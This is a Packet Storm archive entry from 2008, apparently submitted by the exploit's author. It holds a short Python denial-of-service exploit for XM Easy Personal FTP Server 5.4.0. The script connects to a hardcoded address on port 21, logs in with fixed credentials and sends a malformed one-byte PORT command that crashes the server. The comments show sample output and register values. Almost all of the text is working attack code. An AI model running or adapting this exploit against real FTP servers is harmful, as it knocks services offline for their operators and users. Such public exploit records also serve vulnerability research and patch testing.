xmeasy-port-dos.txt

2008-04-14T00:00:00
ID PACKETSTORM:65443
Type packetstorm
Reporter j0rgan
Modified 2008-04-14T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
########################################  
# XM Easy Personal FTP Server 5.4.0 (PORT) DoS  
# 1 byte DoS!  
#  
# Elhamdulillahi Rabbil-alemin!  
#  
########################################  
# EAX BAADF00D <- bad food? :)  
# ECX BAADF00D  
########################################  
#  
# bt ~ # ./sploit.py  
#  
# [+] Saljemo zli bafer :)  
# [+] Booooooooom!!!!  
# [+] Finito!  
# bt ~ #  
########################################  
# I wasn't smoking crack, ryujin gave me the red pill! :)  
#  
# Vulnerability discovered and coded by Muris Kurgas a.k.a j0rgan  
# jorganwd [at] gmail [dot] com  
# http://www.jorgan.users.cg.yu  
########################################  
  
import struct  
import socket  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
bafer = 'A'* 1  
print "\n [+] Saljemo zli bafer :)"  
s.connect(('192.168.190.132',21))  
data = s.recv(1024)  
s.send('USER ftp' +'\r\n')  
data = s.recv(1024)  
s.send('PASS lozinka' + '\r\n')  
data = s.recv(1024)  
print " [+] Booooooooom!!!!"  
s.send('PORT ' +bafer+ '\r\n')  
s.close()  
print " [+] Finito! "  
`